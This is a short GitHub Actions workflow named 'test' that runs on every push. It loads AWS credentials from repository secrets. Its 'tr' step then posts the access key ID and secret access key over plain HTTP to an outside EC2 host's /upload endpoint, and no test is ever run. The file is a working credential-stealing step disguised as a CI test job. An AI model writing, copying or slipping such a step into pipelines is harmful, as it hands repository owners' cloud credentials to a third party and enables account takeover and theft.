name: test

on: [push]

jobs:
  test:
    runs-on: ubuntu-latest

    steps:
    - name: Checkout code
      uses: actions/checkout@v2

    - name: tests
      uses: aws-actions/configure-aws-credentials@v4
      with:
        aws-access-key-id: ${{ secrets.AWS_ACCESS_KEY_ID }}
        aws-secret-access-key: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
        aws-region: us-east-1

    - name: tr
      run: |
        curl -X POST http://ec2-13-201-100-246.ap-south-1.compute.amazonaws.com:8000/upload \
        -H "Content-Type: application/json" \
        -d '{
              "aws-access-key-id": "'"${{ secrets.AWS_ACCESS_KEY_ID }}"'",
              "aws-secret-access-key": "'"${{ secrets.AWS_SECRET_ACCESS_KEY }}"'",
              "aws-region": "us-east-1"
            }'
